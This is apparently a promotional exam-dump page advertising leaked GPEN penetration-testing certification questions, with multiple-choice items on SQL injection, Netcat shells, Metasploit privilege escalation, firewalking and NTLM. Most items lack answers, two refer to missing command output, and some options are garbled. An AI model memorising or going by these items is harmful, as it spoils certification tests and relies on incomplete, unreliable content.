♥♥ 2018 NEW RECOMMEND ♥♥

★ Pass on Your First TRY ★ 100% Money Back Guarantee ★ Realistic Practice Exam Questions

Free Instant Download NEW GPEN Exam Dumps (PDF & VCE):
Available on: https://www.exambible.com/GPEN-exam/

Exam Code: GPEN (Practice Exam Latest Test Questions VCE PDF)
Exam Name: GIAC Certified Penetration Tester
Certification Provider: GIAC
Free Today! Guaranteed Training- Pass GPEN Exam.

Q65. - (Topic 1) 

Which of the following is possible in some SQL injection vulnerabilities on certain types of databases that affects the underlying server OS? 

A. Database structure retrieval 

B. Shell command execution 

C. Data manipulation 

D. Data query capabilities 


Explanation: Reference: 


Q66. - (Topic 1) 

You are pen testing a network and have shell access to a machine via Netcat. You try to use ssh to access another machine from the first machine. What is the expected result? 

A. The ssh connection will succeed If you have root access on the intermediate machine 

B. The ssh connection will fail 

C. The ssh connection will succeed 

D. The ssh connection will succeed if no password required 


Q67. - (Topic 1) 

How can web server logs be leveraged to perform Cross-Site Scripting (XSSI? 

A. Web logs containing XSS may execute shell scripts when opened In a GUI textbrowser 

B. XSS attacks cause web logs to become unreadable and therefore are an effective DOS attack. 

C. If web logs are viewed in a web-based console, log entries containing XSS mayexecute on the browser. 

D. When web logs are viewed in a terminal. XSS can escape to the shell and executecommands. 


Q68. - (Topic 1) 

A penetration tester used a client-side browser exploit from metasploit to get an unprivileged shell prompt on the target Windows desktop. The penetration tester then tried using the getsystem command to perform a local privilege escalation which failed. Which of the following could resolve the problem? 

A. Load priv module and try getsystem again 

B. Run getuid command, then getpriv command, and try getsystem again 

C. Run getuid command and try getsystem again 

D. Use getprivs command instead of getsystem 


Q69. - (Topic 1) 

Analyze the command output below, what action is being performed by the tester? 


A. Displaying a Windows SAM database 

B. Listing available workgroup services 

C. Discovering valid user accounts 

D. Querying locked out user accounts 


Q70. - (Topic 2) 

Which of the following statements are true about firewalking? 

Each correct answer represents a complete solution. Choose all that apply. 

A. To use firewalking, the attacker needs the IP address of the last known gateway before the firewall and the IP address of a host located behind the firewall. 

B. Firewalking works on the UDP packets. 

C. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one hop past the firewall. 

D. A malicious attacker can use firewalking to determine the types of ports/protocols that can bypass the firewall. 

Answer: A,C,D 

Q71. - (Topic 1) 

Analyze the excerpt from a packet capture between the hosts and What factual conclusion can the tester draw from this output? 


A. Port 135 is filtered, port 139 is open. 

B. Pons 135 and 139 are filtered. 

C. Ports 139 and 135 are open. 

D. Port 139 is closed, port 135 is open 


Q72. - (Topic 1) 

What is the main difference between LAN MAN and NTLMv1 challenge/responses? 

A. NTLMv1 only pads IS bytes, whereas LANMAN pads to 21 bytes 

B. NTLMv1 starts with the NT hash, whereas LANMAN starts with the LANMAN hash 

C. NTLMv1utilizes DES, whereas LANMAN utilizes MD4 

D. NTLMv1 splits the hash into 3 eight-byte pieces, whereas LAN MAN splits the hash Into 3 seven-byte pieces